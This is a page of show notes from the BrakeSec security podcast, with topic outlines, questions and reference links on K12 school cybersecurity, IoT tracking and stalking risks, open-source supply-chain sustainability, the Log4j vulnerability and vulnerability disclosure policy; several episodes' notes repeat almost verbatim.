BrakeSec Education Podcast

https://twitch.tv/brakesec www.brakeingsecurity.com @infosystir on Twitter @bryanbrake @boettcherpwned

https://twitch.tv/brakesec www.brakeingsecurity.com @infosystir on Twitter @bryanbrake @boettcherpwned

Shannon Noonan and Stacey Cameron - QoS Consulting https://www.bizagi.com/en/blog/digital-process-automation/4-ways-to-deliver-change-management-for-process-automation https://www.forrester.com/blogs/the-new-change-management-automated-and-decentralized/ https://www.tibco.com/reference-center/what-is-process-automation https://kissflow.com/workflow/workflow-automation/an-8-step-checklist-to-get-your-workflow-ready-for-automation/ https://www.malwarearchaeology.com/cheat-sheets https://overapi.com/ https://www.darkreading.com/attacks-breaches/8-character-passwords-can-be-cracked-in-less-than-60-minutes

https://www.twitch.tv/brakesec Youtube video (full version): https://www.youtube.com/watch?v=eRwYB22XMNw Shannon Noonan and Stacey Cameron - QoS Consulting https://www.bizagi.com/en/blog/digital-process-automation/4-ways-to-deliver-change-management-for-process-automation https://www.forrester.com/blogs/the-new-change-management-automated-and-decentralized/ https://www.tibco.com/reference-center/what-is-process-automation https://kissflow.com/workflow/workflow-automation/an-8-step-checklist-to-get-your-workflow-ready-for-automation/ https://www.malwarearchaeology.com/cheat-sheets https://overapi.com/ https://www.darkreading.com/attacks-breaches/8-character-passwords-can-be-cracked-in-less-than-60-minutes

For context, we at the K12 Security Information Exchange (K12 SIX) are a relatively new K12-specific ISAC – launched to help protect the US K12 sector from emerging cybersecurity risk. One of our signature accomplishments in our first year was the development and release of our 'essential protections' series – an effort to establish baseline cybersecurity standards for schools. See: https://www.k12six.org/essential-cybersecurity-protections https://www.grf.org/ Global Resilience Federation We will help your industry develop or enhance a trusted threat information sharing community, obtain actionable intelligence, and support you in emergencies. We all count on the resiliency of essential services - services from the electricity powering our homes and the connectivity of entertainment apps, to the legal systems and financial pipelines driving the global economy. But this infrastructure faces constant threats from hacktivists, criminals, and rogue states, and they are growing in sophistication. Leveraging nearly 20 years of ISAC and ISAO expertise, GRF is a non-profit created to connect sharing communities, for mutual defense. https://static1.squarespace.com/static/5e441b46adfb340b05008fe7/t/611d5fceff375d79ff4507c7/1629315022292/K12+SIX+Essential+Cybersecurity+Protections+2021+2022.pdf https://theconversation.com/cybercriminals-use-pandemic-to-attack-schools-and-colleges-167619 https://edscoop.com/texas-school-paid-547k-ransomware-jam/ https://statescoop.com/ransomware-allen-texas-school-district-email-parents/ https://www.toptal.com/insights/innovation/cybersecurity-in-higher-education https://www.highereddive.com/spons/inside-higher-educations-ransomware-crisis-how-colleges-and-universities/609688/ https://www.cnn.com/2022/01/07/politics/ransomware-schools-website/index.html https://www.13abc.com/2021/02/22/toledo-public-school-students-seeing-effects-of-massive-data-breach/ 2020 report: https://k12cybersecure.com/wp-content/uploads/2021/03/StateofK12Cybersecurity-2020.pdf 85-89% are underneath 2,500 students Omg: https://www.edweek.org/leadership/education-statistics-facts-about-american-schools/2019/01 https://www.youtube.com/watch?v=otv0KzkfLSc –Florida mom, daughter accused of rigging homecoming queen votes break silence l GMA There are 130,930 public and private K-12 schools in the U.S., according to 2017-18 data from the National Center for Education Statistics (NCES). Here's how they break down: All: 130,930 Elementary schools: 87,498 Secondary schools: 26,727 Combined schools: 15,804 Other: 901 What are some of the ways you go about addressing the challenge of even reaching smaller schools? Does the isac help? How do you communicate major security events like log4j? Do you keep track of complications with certain software stacks? Someone listening might say "hey, I'd love to help…" what/if any opportunities can the larger infosec community do to help your org?

The K12 Security Information Exchange (K12 SIX) are a relatively new K12-specific ISAC – launched to help protect the US K12 sector from emerging cybersecurity risk. One of our signature accomplishments in our first year was the development and release of our 'essential protections' series – an effort to establish baseline cybersecurity standards for schools. See: https://www.k12six.org/essential-cybersecurity-protections https://www.grf.org/ Global Resilience Federation We will help your industry develop or enhance a trusted threat information sharing community, obtain actionable intelligence, and support you in emergencies. We all count on the resiliency of essential services - services from the electricity powering our homes and the connectivity of entertainment apps, to the legal systems and financial pipelines driving the global economy. But this infrastructure faces constant threats from hacktivists, criminals, and rogue states, and they are growing in sophistication. Leveraging nearly 20 years of ISAC and ISAO expertise, GRF is a non-profit created to connect sharing communities, for mutual defense. https://static1.squarespace.com/static/5e441b46adfb340b05008fe7/t/611d5fceff375d79ff4507c7/1629315022292/K12+SIX+Essential+Cybersecurity+Protections+2021+2022.pdf https://theconversation.com/cybercriminals-use-pandemic-to-attack-schools-and-colleges-167619 https://edscoop.com/texas-school-paid-547k-ransomware-jam/ https://statescoop.com/ransomware-allen-texas-school-district-email-parents/ https://www.toptal.com/insights/innovation/cybersecurity-in-higher-education https://www.highereddive.com/spons/inside-higher-educations-ransomware-crisis-how-colleges-and-universities/609688/ https://www.cnn.com/2022/01/07/politics/ransomware-schools-website/index.html https://www.13abc.com/2021/02/22/toledo-public-school-students-seeing-effects-of-massive-data-breach/ 2020 report: https://k12cybersecure.com/wp-content/uploads/2021/03/StateofK12Cybersecurity-2020.pdf 85-89% of school systems have 2,500 students or fewer Omg: https://www.edweek.org/leadership/education-statistics-facts-about-american-schools/2019/01 https://www.youtube.com/watch?v=otv0KzkfLSc –Florida mom, daughter accused of rigging homecoming queen votes break silence There are 130,930 public and private K-12 schools in the U.S., according to 2017-18 data from the National Center for Education Statistics (NCES). Here's how they break down: All: 130,930 Elementary schools: 87,498 Secondary schools: 26,727 Combined schools: 15,804 Other: 901 What are some of the ways you go about addressing the challenge of even reaching smaller schools? Does the isac help? How do you communicate major security events like log4j? Do you keep track of complications with certain software stacks? Someone listening might say "hey, I'd love to help…" what/if any opportunities can the larger infosec community do to help your org?

Alyssa Milller (@AlyssaM_InfoSec) April Wright (@Aprilwright) Open Source issues (quick discussion, because I value your opinions, and supply chain is important in the IoT world too.) Log4j and OSS software management and profitability Free as in beer, but you pay for the cup… (license costs $$, not the software). "If you make money using our software, you must buy a license" - not an end-user license Open source conference at Whitehouse: https://www.zdnet.com/article/log4j-after-white-house-meeting-google-calls-for-list-of-critical-open-source-projects/ https://www.wsj.com/articles/white-house-convenes-open-source-security-summit-amid-log4j-risks-11642119406 "For too long, the software community has taken comfort in the assumption that open source software is generally secure due to its transparency and the assumption that many eyes were watching to detect and resolve problems," said Kent Walker, chief legal officer at Google in a blog post published after the meeting. "But in fact, while some projects do have many eyes on them, others have few or none at all." Show was inspired by this Twitter conversation: https://twitter.com/aprilwright/status/1461724712455782400?t=Fv2tmSTXrn-SSjPCka3gxg&s=19 https://twitter.com/AlyssaM_InfoSec/status/1464661807751213056?t=CFy-hgcHo2a8NwowKYo0hg&s=19 IOT architecture (https://www.avsystem.com/blog/iot-ecosystem/) Open source IoT platforms: https://www.record-evolution.de/en/open-source-iot-platforms-making-innovation-count/ Cloud services - processing messages, register/de-register devices, pass messages to other devices/gateways Gateways - Devices - Mobile apps - SDKs - integrations Cloud services DO go offline, point of failure:https://www.datacenterdynamics.com/en/news/aws-us-east-1-outage-brings-down-services-around-the-world/ Connectivity and sharing mesh networks assumes you like your neighbors. Sidewalk Whitepaper: https://m.media-amazon.com/images/G/01/sidewalk/final_privacy_security_whitepaper.pdf network vulnerabilities: https://fractionalciso.com/why-you-should-not-be-using-xfinitywifi-hotspots/ Stalking/privacy vs. tracking/surveillance Fine GPS locations Nearby devices triangulate (via BLE, wifi, or 900mhz) We want to find our lost devices, but devices can be used for stalking https://www.autoevolution.com/news/police-claim-apple-has-unwillingly-created-the-most-convenient-stalking-device-179228.html Just have an iPhone and you'll be able to find a stalking device, just install a 100MB app (Ring, Alexa, etc) to detect all devices in the area, or use the right ecosystem to find these items (or know every possible device that could be used to track someone) What do companies want with that information? What is a 'happy medium' to allow you to find your dog, but not to track people? Device controls? Buzzers? (how loud can you make a noise in a small device?) Size issues, battery life, beaconing, self-identification ("Hi, I am a lost device…") Is what Airtags doing enough to reduce the fear? Are we designing to edge cases? There are cheaper/easier ways to track someone (phones have a longer standby time than fetch/airtag/tile) How often do you lose your keys? Why is your dog not on a leash or properly trained? What will it take to make these kinds of devices more secure? https://spectrum.ieee.org/why-iot-sensors-need-standards Will it take privacy protections to motivate IoT devices to design a better IoT device? Or force standards to be followed, like https://www.ioxtalliance.org/get-ioxt-certified? Or NIST standards: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-213-draft.pdf https://csrc.nist.gov/publications/detail/sp/800-213a/final - detailed specs Threat modeling, vulnerabilities in IoT networks and platforms Does your Iot Platform give out SDKs for integrations or allowing 3rd party products or apps? https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/ https://www.avsystem.com/blog/iot-ecosystem/ Old and outdated libraries, like TCP vulnerabilities (RIPPLE20) https://www.businessinsider.com/iot-security-privacy https://www.eurofins-cybersecurity.com/news/security-problems-iot-devices/ https://arxiv.org/ftp/arxiv/papers/1302/1302.0939.pdf - Security and Privacy Issues in Wireless Mesh Networks: A Survey https://krebsonsecurity.com/2021/09/apple-airtag-bug-enables-good-samaritan-attack/ https://www.amazon.com/gp/help/customer/display.html?nodeId=GZ4VSNFMBDHLRJUK Opt-out of Amazon sidewalk Amazon Sidewalk discussion: https://www.silabs.com/support/training/amazon-sidewalk-development/amz-103-amazon-sidewalk-technology-architecture-and-infrastructure Fetch:As one example, this week we announced Fetch, a compact, lightweight device that will clip to your pet's collar and help ensure they're safe. If your dog wanders outside a perimeter you've set using the Ring app, Fetch will let you know. In the future, expanding the Amazon Sidewalk network will provide customers with even more capabilities like real-

Alyssa Milller (@AlyssaM_InfoSec) April Wright (@Aprilwright) Talk about side projects, podcasts, speaking events, etc (if you want to) Open Source issues (quick discussion, because I value your opinions, and supply chain is important in the IoT world too.) Log4j and OSS software management and profitability Free as in beer, but you pay for the cup… (license costs $$, not the software). "If you make money using our software, you must buy a license" - not an end-user license Open source conference at Whitehouse: https://www.zdnet.com/article/log4j-after-white-house-meeting-google-calls-for-list-of-critical-open-source-projects/ https://www.wsj.com/articles/white-house-convenes-open-source-security-summit-amid-log4j-risks-11642119406 "For too long, the software community has taken comfort in the assumption that open source software is generally secure due to its transparency and the assumption that many eyes were watching to detect and resolve problems," said Kent Walker, chief legal officer at Google in a blog post published after the meeting. "But in fact, while some projects do have many eyes on them, others have few or none at all." Show was inspired by this Twitter conversation: https://twitter.com/aprilwright/status/1461724712455782400?t=Fv2tmSTXrn-SSjPCka3gxg&s=19 https://twitter.com/AlyssaM_InfoSec/status/1464661807751213056?t=CFy-hgcHo2a8NwowKYo0hg&s=19 IOT architecture (https://www.avsystem.com/blog/iot-ecosystem/) Open source IoT platforms: https://www.record-evolution.de/en/open-source-iot-platforms-making-innovation-count/ Cloud services - processing messages, register/de-register devices, pass messages to other devices/gateways Gateways - Devices - Mobile apps - SDKs - integrations Cloud services DO go offline, point of failure:https://www.datacenterdynamics.com/en/news/aws-us-east-1-outage-brings-down-services-around-the-world/ Connectivity and sharing mesh networks assumes you like your neighbors. Sidewalk Whitepaper: https://m.media-amazon.com/images/G/01/sidewalk/final_privacy_security_whitepaper.pdf network vulnerabilities: https://fractionalciso.com/why-you-should-not-be-using-xfinitywifi-hotspots/ Stalking/privacy vs. tracking/surveillance Fine GPS locations Nearby devices triangulate (via BLE, wifi, or 900mhz) We want to find our lost devices, but devices can be used for stalking https://www.autoevolution.com/news/police-claim-apple-has-unwillingly-created-the-most-convenient-stalking-device-179228.html Just have an iPhone and you'll be able to find a stalking device, just install a 100MB app (Ring, Alexa, etc) to detect all devices in the area, or use the right ecosystem to find these items (or know every possible device that could be used to track someone) What do companies want with that information? What is a 'happy medium' to allow you to find your dog, but not to track people? Device controls? Buzzers? (how loud can you make a noise in a small device?) Size issues, battery life, beaconing, self-identification ("Hi, I am a lost device…") Is what Airtags doing enough to reduce the fear? Are we designing to edge cases? There are cheaper/easier ways to track someone (phones have a longer standby time than fetch/airtag/tile) How often do you lose your keys? Why is your dog not on a leash or properly trained? What will it take to make these kinds of devices more secure? https://spectrum.ieee.org/why-iot-sensors-need-standards Will it take privacy protections to motivate IoT devices to design a better IoT device? Or force standards to be followed, like https://www.ioxtalliance.org/get-ioxt-certified? Or NIST standards: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-213-draft.pdf https://csrc.nist.gov/publications/detail/sp/800-213a/final - detailed specs Threat modeling, vulnerabilities in IoT networks and platforms Does your Iot Platform give out SDKs for integrations or allowing 3rd party products or apps? https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/ https://www.avsystem.com/blog/iot-ecosystem/ Old and outdated libraries, like TCP vulnerabilities (RIPPLE20) https://www.businessinsider.com/iot-security-privacy https://www.eurofins-cybersecurity.com/news/security-problems-iot-devices/ https://arxiv.org/ftp/arxiv/papers/1302/1302.0939.pdf - Security and Privacy Issues in Wireless Mesh Networks: A Survey https://krebsonsecurity.com/2021/09/apple-airtag-bug-enables-good-samaritan-attack/ https://www.amazon.com/gp/help/customer/display.html?nodeId=GZ4VSNFMBDHLRJUK Opt-out of Amazon sidewalk Amazon Sidewalk discussion: https://www.silabs.com/support/training/amazon-sidewalk-development/amz-103-amazon-sidewalk-technology-architecture-and-infrastructure Fetch:As one example, this week we announced Fetch, a compact, lightweight device that will clip to your pet's collar and help ensure they're safe. If your dog wanders outside a perimeter you've set using the Ring app, Fetch will let you know. In the future, expanding the Amazon Side

News articles we covered this week: https://www.wired.com/story/belarus-railways-ransomware-hack-cyber-partisans/ https://www.hackingarticles.in/linux-privilege-escalation-polkit-cve-2021-3560/ https://old.reddit.com/r/msp/comments/s48iji/vmware_horizon_servers_being_actively_hit_with/ https://www.bleepingcomputer.com/news/security/over-20-000-data-center-management-systems-exposed-to-hackers/ Whimmery's Walkthroughs: Join @whimmery on her twitch or on the @brakesec Youtube channel for walkthroughs on Burp Suite training and more! Twitter handles: Official Podcast: @brakesec Brian Boettcher: @boettcherpwned Amanda Berlin: @infosystir @hackersHealth @infosecroleplay Bryan Brake: @bryanbrake

Alyssa Milller (@AlyssaM_InfoSec) April Wright (@Aprilwright) 0. Open Source issues (quick discussion, because I value your opinions, and supply chain is important in the IoT world too.) Log4j and OSS software management and profitability Free as in beer, but you pay for the cup… (license costs $$, not the software). "If you make money using our software, you must buy a license" - not an end-user license Open source conference at Whitehouse: https://www.zdnet.com/article/log4j-after-white-house-meeting-google-calls-for-list-of-critical-open-source-projects/ https://www.wsj.com/articles/white-house-convenes-open-source-security-summit-amid-log4j-risks-11642119406 "For too long, the software community has taken comfort in the assumption that open source software is generally secure due to its transparency and the assumption that many eyes were watching to detect and resolve problems," said Kent Walker, chief legal officer at Google in a blog post published after the meeting. "But in fact, while some projects do have many eyes on them, others have few or none at all." Show was inspired by this Twitter conversation: https://twitter.com/aprilwright/status/1461724712455782400?t=Fv2tmSTXrn-SSjPCka3gxg&s=19 https://twitter.com/AlyssaM_InfoSec/status/1464661807751213056?t=CFy-hgcHo2a8NwowKYo0hg&s=19 IOT architecture (https://www.avsystem.com/blog/iot-ecosystem/) Open source IoT platforms: https://www.record-evolution.de/en/open-source-iot-platforms-making-innovation-count/ Cloud services - processing messages, register/de-register devices, pass messages to other devices/gateways Gateways - Devices - Mobile apps - SDKs - integrations Cloud services DO go offline, point of failure: https://www.datacenterdynamics.com/en/news/aws-us-east-1-outage-brings-down-services-around-the-world/ Connectivity and sharing mesh networks assumes you like your neighbors. Sidewalk Whitepaper: https://m.media-amazon.com/images/G/01/sidewalk/final_privacy_security_whitepaper.pdf network vulnerabilities: https://fractionalciso.com/why-you-should-not-be-using-xfinitywifi-hotspots/ Stalking/privacy vs. tracking/surveillance Fine GPS locations Nearby devices triangulate (via BLE, wifi, or 900mhz) We want to find our lost devices, but devices can be used for stalking https://www.autoevolution.com/news/police-claim-apple-has-unwillingly-created-the-most-convenient-stalking-device-179228.html Just have an iPhone and you'll be able to find a stalking device, just install a 100MB app (Ring, Alexa, etc) to detect all devices in the area, or use the right ecosystem to find these items (or know every possible device that could be used to track someone) What do companies want with that information? What is a 'happy medium' to allow you to find your dog, but not to track people? Device controls? Buzzers? (how loud can you make a noise in a small device?) Size issues, battery life, beaconing, self-identification ("Hi, I am a lost device…") Is what Airtags doing enough to reduce the fear? Are we designing to edge cases? There are cheaper/easier ways to track someone (phones have a longer standby time than fetch/airtag/tile) How often do you lose your keys? Why is your dog not on a leash or properly trained? What will it take to make these kinds of devices more secure? https://spectrum.ieee.org/why-iot-sensors-need-standards Will it take privacy protections to motivate IoT devices to design a better IoT device? Or force standards to be followed, like https://www.ioxtalliance.org/get-ioxt-certified? Or NIST standards: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-213-draft.pdf https://csrc.nist.gov/publications/detail/sp/800-213a/final - detailed specs Threat modeling, vulnerabilities in IoT networks and platforms Does your Iot Platform give out SDKs for integrations or allowing 3rd party products or apps? https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/ https://www.avsystem.com/blog/iot-ecosystem/ Old and outdated libraries, like TCP vulnerabilities (RIPPLE20) https://www.businessinsider.com/iot-security-privacy https://www.eurofins-cybersecurity.com/news/security-problems-iot-devices/ https://arxiv.org/ftp/arxiv/papers/1302/1302.0939.pdf - Security and Privacy Issues in Wireless Mesh Networks: A Survey https://krebsonsecurity.com/2021/09/apple-airtag-bug-enables-good-samaritan-attack/ https://www.amazon.com/gp/help/customer/display.html?nodeId=GZ4VSNFMBDHLRJUK Opt-out of Amazon sidewalk Amazon Sidewalk discussion: https://www.silabs.com/support/training/amazon-sidewalk-development/amz-103-amazon-sidewalk-technology-architecture-and-infrastructure Fetch: As one example, this week we announced Fetch, a compact, lightweight device that will clip to your pet's collar and help ensure they're safe. If your dog wanders outside a perimeter you've set using the Ring app, Fetch will let you know. In the future, expanding the Amazon Sidewalk network will provide customers with even more capabilities like

Adam Baldwin (@adam_baldwin) Amélie Koran (@webjedi) https://logging.apache.org/log4j/2.x/license.html https://www.theregister.com/2021/12/14/log4j_vulnerability_open_source_funding/ https://www.zdnet.com/article/security-firm-blumira-discovers-major-new-log4j-attack-vector/ F/OSS developer deliberately bricks his software in retaliation for big companies not supporting OSS. https://twitter.com/BleepinComputer/status/1480182019854327808 https://www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps/ https://developers.slashdot.org/story/22/01/09/2336239/open-source-developer-intentionally-corrupts-his-own-widely-used-libraries Faker.js - https://www.npmjs.com/package/faker Generate massive amounts of fake contextual data Colors.js - https://www.npmjs.com/pafaker - npm package/colors get color and style in your node.js console https://abc7ny.com/suspicious-package-queens-astoria-fire/6425363/ Should OSS teams expect payment for giving their time/code away for free? What are their expectations Should open source projects be aware of how popular they are? What happens when they reach a certain level of popularity? OSS Sustainability - https://github.blog/2019-01-17-lets-talk-about-open-source-sustainability/ https://webjedi.net/2022/01/03/security-puppy/ Apparently, "Hobbyists" were the bane of a young Bill Gates: (can you https://en.wikipedia.org/wiki/Open_Letter_to_Hobbyists https://en.wikipedia.org/wiki/History_of_free_and_open-source_software History of open source Licensing Overview: https://youtu.be/Eu_GvrSlShI (this was a talk I gave for Splunk on this --AK) Event-stream = https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets https://libraries.io/ Libraries.io monitors 5,039,738 open source packages across 32 different package managers, so you don't have to.

Adam Baldwin (@adam_baldwin) Amélie Koran (@webjedi) Log4j vulnerability https://logging.apache.org/log4j/2.x/license.html https://www.theregister.com/2021/12/14/log4j_vulnerability_open_source_funding/ https://www.zdnet.com/article/security-firm-blumira-discovers-major-new-log4j-attack-vector/ F/OSS developer deliberately bricks his software in retaliation for big companies not supporting OSS. https://twitter.com/BleepinComputer/status/1480182019854327808 https://www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps/ https://developers.slashdot.org/story/22/01/09/2336239/open-source-developer-intentionally-corrupts-his-own-widely-used-libraries Faker.js - https://www.npmjs.com/package/faker Generate massive amounts of fake contextual data Colors.js - https://www.npmjs.com/pafaker - npmckage/colors get color and style in your node.js console https://abc7ny.com/suspicious-package-queens-astoria-fire/6425363/ Should OSS teams expect payment for giving their time/code away for free? What are their expectations Should open source projects be aware of how popular they are? What happens when they reach a certain level of popularity? OSS Sustainability - https://github.blog/2019-01-17-lets-talk-about-open-source-sustainability/ https://webjedi.net/2022/01/03/security-puppy/ Apparently, "Hobbyists" were the bane of a young Bill Gates: (can you https://en.wikipedia.org/wiki/Open_Letter_to_Hobbyists https://en.wikipedia.org/wiki/History_of_free_and_open-source_software History of open source Licensing Overview: https://youtu.be/Eu_GvrSlShI (this was a talk I gave for Splunk on this) Event-stream = https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets https://libraries.io/ Libraries.io monitors 5,039,738 open source packages across 32 different package managers, so you don't have to.

Introduction Overview of Log4j vuln (as of 16 December 2021) Why is it a big deal? (impact/criticality/risk) Talk about patching vs. mitigation why wasn't this given the same visibility in 2009? Because it's Oracle or Java? Good callout is building slides to brief org leadership, detections, and other educational tools. Vuln fatigue (Java vulns in 2009 and pretty much forever cause us fatigue) Are there other technologies like log4j that prop up the entire world, and we just don't know? Egress traffic (discussed at length on twitter, what problems it solve?) https://twitter.com/mubix/status/1470430085169745920 Latest: https://www.theregister.com/2021/12/14/apache_log4j_v2_16_jndi_disabled_default/ - apache removed JDNI functionality https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/ https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/ https://issues.apache.org/jira/plugins/servlet/mobile#issue/LOG4J2-313 Lots of discussion about "SBOM solving the issue". @K8em0 weighs in https://twitter.com/k8em0/status/1469437490691932164 https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592 -list of advisories for log4j Mitigation: https://twitter.com/brunoborges/status/1469186875608875011 https://twitter.com/DannyThomas/status/1469709039911129088 (holy hell, 2009?!?) 2009 in fact, #CVE-2009-1094, then a bypass was fixed in CVE-2018-3149: https://bugzilla.redhat.com/show_bug.cgi?id=1639834. That's when the JDK was fully protected, but other implementations remained vulnerable https://bugzilla.redhat.com/show_bug.cgi?id=1639834 OpenJDK… https://twitter.com/ThinkstCanary/status/1469439743905697797?s=20 You can use a point & click canarytoken from https://canarytokens.org to help test for the #log4j / #Log4Shell issue. 1) visit https://canarytokens.org; 2) choose the Log4shell token; 3) enter the email address you wish to be notified at; 4) copy/use the returned string... Discussed in 2016 at Blackhat: https://twitter.com/th3_protoCOL/status/1469644923028656130 The #Log4Shell attack vector was known since 2016… https://twitter.com/bettersafetynet/status/1469470284977745932 Just got off phone with a client. Log4j is in their network. Vendor claims patch will be available next release... which is multiple months from now. Here's what you do if you're in this situation. 1. Keep calm. There's no need to panic. 2. Carefully read this thread. When dealing with attacks like this you should remember the acronym IMMA. I = Isolate M = Minimize M = Monitor A = Active Defense https://github.com/MarkBaggett/srum-dump "SRUM Dump extracts information from the System Resource Utilization Management Database and creates a Excel spreadsheet. The SRUM is one of the best sources for applications that have run on your system in the last 30 days and is invaluable to your incident investigations! To use the tool you will need a copy of the SRUM (located in c:\windows\system32\sru\srudb.dat, but locked by the OS). This tool also requires a SRUM_TEMPLATE that defines table and field names. You can optionally provide the SOFTWARE registry hive and the tool will tell you which wireless networks were in use by applications. If you are looking for a version of this tool that creates CSV files instead of an Excel spreadsheet, dumps targeted tables or processes any ese then check out ese2csv. ese2csv.exe is designed specifically for csv files with the CLI user in mind." https://support.microsoft.com/en-us/office/digitally-sign-your-macro-project-956e9cc8-bbf6-4365-8bfa-98505ecd1c01

Introduction Overview of Log4j vuln (as of 16 December 2021) Why is it a big deal? (impact/criticality/risk) Talk about patching vs. mitigation why wasn't this given the same visibility in 2009? Because it's Oracle or Java? Good callout is building slides to brief org leadership, detections, and other educational tools. Vuln fatigue (Java vulns in 2009 and pretty much forever cause us fatigue) Are there other technologies like log4j that prop up the entire world, and we just don't know? Egress traffic (discussed at length on twitter, what problems it solve?) https://twitter.com/mubix/status/1470430085169745920 Latest: https://www.theregister.com/2021/12/14/apache_log4j_v2_16_jndi_disabled_default/ - apache removed JDNI functionality https://www.reddit.com/r/blueteamsec/comments/rd38z9/log4j_0day_being_exploited/ https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/ https://issues.apache.org/jira/plugins/servlet/mobile#issue/LOG4J2-313 Lots of discussion about "SBOM solving the issue". @K8em0 weighs in https://twitter.com/k8em0/status/1469437490691932164 https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592 -list of advisories for log4j Mitigation: https://twitter.com/brunoborges/status/1469186875608875011 https://twitter.com/DannyThomas/status/1469709039911129088 (holy hell, 2009?!?) 2009 in fact, #CVE-2009-1094, then a bypass was fixed in CVE-2018-3149: https://bugzilla.redhat.com/show_bug.cgi?id=1639834. That's when the JDK was fully protected, but other implementations remained vulnerable https://bugzilla.redhat.com/show_bug.cgi?id=1639834 OpenJDK… https://twitter.com/ThinkstCanary/status/1469439743905697797?s=20 You can use a point & click canarytoken from https://canarytokens.org to help test for the #log4j / #Log4Shell issue. 1) visit https://canarytokens.org; 2) choose the Log4shell token; 3) enter the email address you wish to be notified at; 4) copy/use the returned string... Discussed in 2016 at Blackhat: https://twitter.com/th3_protoCOL/status/1469644923028656130 The #Log4Shell attack vector was known since 2016… https://twitter.com/bettersafetynet/status/1469470284977745932 Just got off phone with a client. Log4j is in their network. Vendor claims patch will be available next release... which is multiple months from now. Here's what you do if you're in this situation. 1. Keep calm. There's no need to panic. 2. Carefully read this thread. When dealing with attacks like this you should remember the acronym IMMA. I = Isolate M = Minimize M = Monitor A = Active Defense https://github.com/MarkBaggett/srum-dump "SRUM Dump extracts information from the System Resource Utilization Management Database and creates a Excel spreadsheet. The SRUM is one of the best sources for applications that have run on your system in the last 30 days and is invaluable to your incident investigations! To use the tool you will need a copy of the SRUM (located in c:\windows\system32\sru\srudb.dat, but locked by the OS). This tool also requires a SRUM_TEMPLATE that defines table and field names. You can optionally provide the SOFTWARE registry hive and the tool will tell you which wireless networks were in use by applications. If you are looking for a version of this tool that creates CSV files instead of an Excel spreadsheet, dumps targeted tables or processes any ese then check out ese2csv. ese2csv.exe is designed specifically for csv files with the CLI user in mind." https://support.microsoft.com/en-us/office/digitally-sign-your-macro-project-956e9cc8-bbf6-4365-8bfa-98505ecd1c01

New $3 patron! 🎉Thank you John K.! National Domestic Violence Hotline at 1-800-799-7233, or by online chat. National Sexual Assault Hotline at 1-800-656-4673, or by online chat. https://www.stalkingawareness.org/wp-content/uploads/2019/01/SPARC_StalkngFactSheet_2018_FINAL.pdf TALKING VICTIMIZATION An estimated 6-7.5 million people are #stalked in a one year period in the United States. Nearly 1 in 6 women and 1 in 17 men have experienced stalking victimization at some point in their lifetime. Using a less conservative definition of stalking, which considers any amount of fear (i.e., a little fearful, somewhat fearful, or very fearful), 1 in 4 women and 1 in 13 men reported being a victim of stalking in their lifetime. About half of all victims of stalking indicated that they were stalked before the age of 25. Stalkers use many tactics including: Approaching the victim or showing up in places when the victim didn't want them to be there; making unwanted telephone calls; leaving the victim unwanted messages (text or voice); watching or following the victim from a distance spying on the victim with a listening device, camera, or #GPS. (or #IOT device) https://www.vice.com/en/article/d3akpk/smart-home-technology-stalking-harassment https://www.ucl.ac.uk/steapp/sites/steapp/files/giot-report.pdf - Tech Abuse Gender and IoT Research Report https://www.researchgate.net/publication/260867980_TRAPPED_TECHNOLOGY_AS_A_BARRIER_TO_LEAVING_AN_ABUSIVE_RELATIONSHIP Center to End Technical #Abuse (CETA) https://www.ceta.tech.cornell.edu/resources https://82beb9a6-b7db-490a-88be-9f149bafe221.filesusr.com/ugd/c4e6d5_20fe31daffd74b2fb4b4735d703dad6a.pdf -disconnect checklist Tw: stalking resulting in death: A pattern of fixation and obsession': How the #pandemic exacerbated stalking cases in the UK https://www.independent.co.uk/life-style/women/stalking-cases-pandemic-gracie-spinks-b1956589.html https://pathwaystosafety.org/staying-safe/ https://www.techsafety.org/ https://static1.squarespace.com/static/51dc541ce4b03ebab8c5c88c/t/61674c082419497a370af990/1634159630368/2021_T2E+Needs+Assessment+Report.pdf "Smart" or connected devices often referred to as the Internet of Things (IoT) turn up in cases "all the time" or "often" for a third of advocates and 1 in 5 #legal systems professionals. While this is rather low, people are increasingly using these types of technology. With additional use we may see increases in abuse through them. Additionally, advocates and legal systems professionals are often not aware of how these technologies can be misused, so they may not ask about them.

https://twitter.com/Esquiring - Fred Jennings Vulnerabilities Equity program (VEP), vuln disclosure program (VDP), and what is the a way for disclosure of 0day? ('proper' is different and dependent) This show was inspired by this Tweet thread from @k8em0 and @_MG_https://twitter.com/k8em0/status/1459715464691535877 https://twitter.com/_MG_/status/1459718518346174465 Legal Safe Harbor? Copy-left for security researchers…? What is a VEP? Not a new concept (2014) https://obamawhitehouse.archives.gov/blog/2014/04/28/heartbleed-understanding-when-we-disclose-cyber-vulnerabilities Context: Was written when Heartbleed came out. About transparency, but within reason From the blogpost:"We have also established a disciplined, rigorous and high-level decision-making process for vulnerability disclosure. This interagency process helps ensure that all of the pros and cons are properly considered and weighed. While there are no hard and fast rules, here are a few things I want to know when an agency proposes temporarily withholding knowledge of a vulnerability: How much is the vulnerable system used in the core internet infrastructure, in other critical infrastructure systems, in the U.S. economy, and/or in national security systems? Does the vulnerability, if left unpatched, impose significant risk? How much harm could an adversary nation or criminal group do with knowledge of this vulnerability? How likely is it that we would know if someone else was exploiting it? How badly do we need the intelligence we think we can get from exploiting the vulnerability? Are there other ways we can get it? Could we utilize the vulnerability for a short period of time before we disclose it? How likely is it that someone else will discover the vulnerability? Can the vulnerability be patched or otherwise 